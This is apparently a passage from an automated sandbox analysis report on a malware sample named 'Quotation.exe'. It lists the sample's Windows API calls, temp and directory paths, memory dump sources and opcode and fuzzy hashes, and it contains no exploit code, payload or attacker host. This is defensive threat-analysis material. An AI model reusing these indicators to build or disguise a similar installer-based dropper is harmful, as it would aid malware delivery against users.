                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-44229769
                                                              • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                              • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                              • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                              • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768
                                                              APIs
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405EA9
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\ethnocentrism\skggene\Egyptians218,?,00000000,000000F0), ref: 00401652
                                                              Strings
                                                              • C:\Users\user\ethnocentrism\skggene\Egyptians218, xrefs: 00401645
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\ethnocentrism\skggene\Egyptians218
                                                              • API String ID: 1892508949-4259118363
                                                              • Opcode ID: 7f503c08a0778f4355e9e2823a57a0c055de55569a85c0f729d9efbbf8a88517
                                                              • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                              • Opcode Fuzzy Hash: 7f503c08a0778f4355e9e2823a57a0c055de55569a85c0f729d9efbbf8a88517
                                                              • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406660,80000002), ref: 00406435
                                                              • RegCloseKey.ADVAPI32(?), ref: 00406440
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Call
                                                              • API String ID: 3356406503-1824292864
                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                              • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                              • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                              • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                              • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                              • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                              • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                              • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                              • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                              • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                              • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                              • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                              • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                              • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                              • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                              • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll), ref: 00405613
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                              Strings
                                                              Similarity
                                                              • API ID: Global$AllocFree
                                                              • String ID: Call
                                                              • API String ID: 3394109436-1824292864
                                                              APIs
                                                                • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                              • lstrlenW.KERNEL32 ref: 00402344
                                                              • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                              Similarity
                                                              • API ID: FileFindlstrlen$CloseFirstOperation
                                                              • String ID:
                                                              • API String ID: 1486964399-0
                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              APIs
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                              Similarity
                                                              • API ID: CloseDeleteValue
                                                              • String ID:
                                                              • API String ID: 2831762973-0
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                              • GetLastError.KERNEL32 ref: 00405AC5
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                              Similarity
                                                              • API ID: Window$EnableShow
                                                              • String ID:
                                                              • API String ID: 1136574915-0
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                              • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                              • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                              • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406015
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                              • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                              • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                              • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                              • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                              • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                              • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                              • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                              APIs
                                                              • EnumWindows.USER32(00000000), ref: 73422C57
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                               • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmp
                                                               • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: EnumWindows
                                                              • String ID:
                                                              • API String ID: 1129996299-0
                                                              • Opcode ID: be084a82f076620c9dd2bfb2ed9696065f080c1cbf2bcfffd387e08b1dc3b35c
                                                              • Instruction ID: 4f74fb59a2494e6b692ea2b907b7f3f158993ee4e7d949cfd4d58f475ec6c535
                                                              • Opcode Fuzzy Hash: be084a82f076620c9dd2bfb2ed9696065f080c1cbf2bcfffd387e08b1dc3b35c
                                                              • Instruction Fuzzy Hash: F541B2B2900308DFEB5DAF65DC40B59BFB8FB14352F308469E409F7241D6799480CBA9
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FilePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 327478801-0
                                                              • Opcode ID: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                              • Instruction ID: 3ecce12b6213660a705480fd24811c4b14f3d13bc743ad81d22bf59cde18bc7d
                                                              • Opcode Fuzzy Hash: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                              • Instruction Fuzzy Hash: 8DE06D71904208AFDB01ABA5AA498AEB379EB44344B10483FF101B10C0CA794C119A2D
                                                              APIs
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
